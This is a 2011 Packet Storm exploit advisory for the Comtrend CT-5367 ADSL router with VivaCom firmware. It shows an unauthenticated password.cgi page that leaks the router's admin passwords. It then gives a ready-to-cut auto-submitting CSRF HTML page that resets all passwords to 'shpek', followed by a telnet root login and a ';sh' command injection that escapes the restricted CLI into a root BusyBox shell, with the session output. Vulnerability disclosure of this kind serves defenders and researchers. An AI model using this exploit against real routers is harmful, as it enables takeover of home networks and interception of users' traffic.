Comtrend ADSL Router BTC (VivaCom) Cross Site Request Forgery

2011-03-04T00:00:00
ID PACKETSTORM:98920
Type packetstorm
Reporter Todor Donev
Modified 2011-03-04T00:00:00

Description

/*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Remote Root  
=============================================================================  
Board ID : 96338A-122  
Software : A111-312BTC-C01_R12  
Bootloader : 1.0.37-12.1-1  
Wireless Driver : 4.170.16.0.cpe2.1sd  
ADSL : A2pB023k.d20k_rc2  
  
=============================================================================  
Type : HardWare  
Risk of use : High  
Type to use : Remote  
Discovered by : Todor Donev  
Author Email : todor.donev@gmail.com  
  
=============================================================================  
Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska,  
and all my other friends that support me a lot of times for everything !!  
  
*/  
  
root@linux:~# get.pl http://192.168.1.1/  
  
/*HTTP/1.1 401 Unauthorized  
Cache-Control: no-cache  
Connection: close  
Date: Sat, 01 Jan 2000 00:04:31 GMT  
Server: micro_httpd ## Yeah !! Bite me :(  
WWW-Authenticate: Basic realm="DSL Router"  
Content-Type: text/html  
  
<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>  
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>  
Authorization required.  
<HR>  
<ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS>  
</BODY></HTML>  
*/  
  
root@linux:~# get.pl http://192.168.1.1/password.cgi ## Information Disclosure: returns 200, not the 401 that / requires above  
  
/*HTTP/1.1 200 Ok  
Cache-Control: no-cache  
Connection: close  
Date: Mon, 03 Jan 2000 23:01:25 GMT  
Server: micro_httpd  
Content-Type: text/html  
  
<html>  
<head>  
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>  
<link rel="stylesheet" href='stylemain.css' type='text/css'>  
<link rel="stylesheet" href='colors.css' type='text/css'>  
<script language="javascript" src="util.js"></script>  
<script language="javascript">  
<!-- hide\n ## Dammit! =))  
pwdAdmin = '<CENSORED>'; ## Censored Password  
pwdSupport = '<CENSORED>'; ## Censored Password  
pwdUser = '<CENSORED>';\n ## Censored Password  
*/  
  
  
  
[CUT EXPLOIT HERE] ## CSRF to change all passwords (password.cgi accepts the POST without authentication)  
<html>  
<head></head>  
<title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title>  
<body onLoad=javascript:document.form.submit()>  
<form action="http://192.168.1.1/password.cgi"; method="POST" name="form">  
<!-- Change default system Passwords to "shpek" without authentication and verification -->  
<input type="hidden" name="sptPassword" value="shpek">  
<input type="hidden" name="usrPassword" value="shpek">  
<input type="hidden" name="sysPassword" value="shpek">  
</form>  
</body>  
</html>  
[CUT EXPLOIT HERE]  
  
  
root@linux:~# telnet 192.168.1.1  
  
ADSL Router Model CT-5367 Sw.Ver. C01_R12  
Login: root  
Password:  
## BINGOO !! Godlike =))  
> ?  
  
?  
help  
logout  
reboot  
adsl  
atm  
ddns  
dumpcfg  
ping  
siproxd  
sntp  
sysinfo  
tftp  
wlan  
version  
build  
ipfilter  
  
> sysinfo  
Number of processes: 30  
11:46pm up 2 days, 23:46,  
load average: 1 min:0.12, 5 min:0.05, 15 min:0.09  
total used free shared buffers  
Mem: 14012 13028 984 0 588  
Swap: 0 0 0  
Total: 14012 13028 984  
  
> sysinfo ;sh ## JAILBREAK !! The restricted CLI passes the line to a shell unescaped, so ";sh" escapes it  
Number of processes: 30  
11:47pm up 2 days, 23:47,  
load average: 1 min:0.07, 5 min:0.05, 15 min:0.08  
total used free shared buffers  
Mem: 14012 13024 988 0 588  
Swap: 0 0 0  
Total: 14012 13024 988  
  
  
BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh)  
Enter 'help' for a list of built-in commands.  
  
# cat /proc/version  
Linux version 2.6.8.1 (wander@localhost.localdomain) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009  
  
# ps  
PID Uid VmSize Stat Command  
1 root 280 S init  
2 root SWN [ksoftirqd/0]  
3 root SW< [events/0]  
4 root SW< [khelper]  
5 root SW< [kblockd/0]  
15 root SW [pdflush]  
16 root SW [pdflush]  
17 root SW [kswapd0]  
18 root SW< [aio/0]  
23 root SW [mtdblockd]  
32 root 328 S -sh  
65 root 1384 S cfm  
72 root SW [bcmsw]  
192 root 216 S pvc2684d  
275 root 496 S nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A  
342 root 304 S dhcpd  
596 root 1384 S CT_Polling  
600 root 432 S pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p  
931 root 248 S dhcpc -i nas_0_0_40  
993 root 316 S dproxy -D btc-adsl  
997 root 352 S upnp -L br0 -W ppp_0_0_35_1 -D  
1013 root 512 S siproxd --config /var/siproxd/siproxd.conf  
1014 root 512 S siproxd --config /var/siproxd/siproxd.conf  
1015 root 512 S siproxd --config /var/siproxd/siproxd.conf  
10745 root 292 S syslogd -C -l 7  
10747 root 256 S klogd  
6616 root 1396 S telnetd  
6618 root 1428 S telnetd  
6673 root 284 S sh -c sysinfo ;sh  
6724 root 284 R ps  
  
# top  
Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached  
Load average: 0.00, 0.02, 0.07 (State: S=sleeping R=running, W=waiting)  
  
PID USER STATUS RSS PPID %CPU %MEM COMMAND  
6751 root R 288 6675 0.7 2.0 exe  
2 root SWN 0 1 0.3 0.0 ksoftirqd/0  
6616 root S 1396 65 0.1 9.9 telnetd  
931 root S 248 1 0.1 1.7 dhcpc  
6618 root S 1428 6616 0.0 10.1 telnetd  
65 root S 1384 32 0.0 9.8 cfm  
596 root S 1384 65 0.0 9.8 CT_Polling  
1013 root S 512 1 0.0 3.6 siproxd  
1014 root S 512 1013 0.0 3.6 siproxd  
1015 root S 512 1014 0.0 3.6 siproxd  
275 root S 496 1 0.0 3.5 nas  
600 root S 432 1 0.0 3.0 pppd  
997 root S 352 1 0.0 2.5 upnp  
32 root S 328 1 0.0 2.3 sh  
993 root S 316 1 0.0 2.2 dproxy  
6675 root S 316 6673 0.0 2.2 exe  
342 root S 304 1 0.0 2.1 dhcpd  
10745 root S 292 1 0.0 2.0 exe  
6673 root S 284 6618 0.0 2.0 sh  
1 root S 280 0 0.0 1.9 init  
# echo * ## ls o.O?!?   
bin dev etc lib linuxrc mnt proc sbin usr var webs  
#   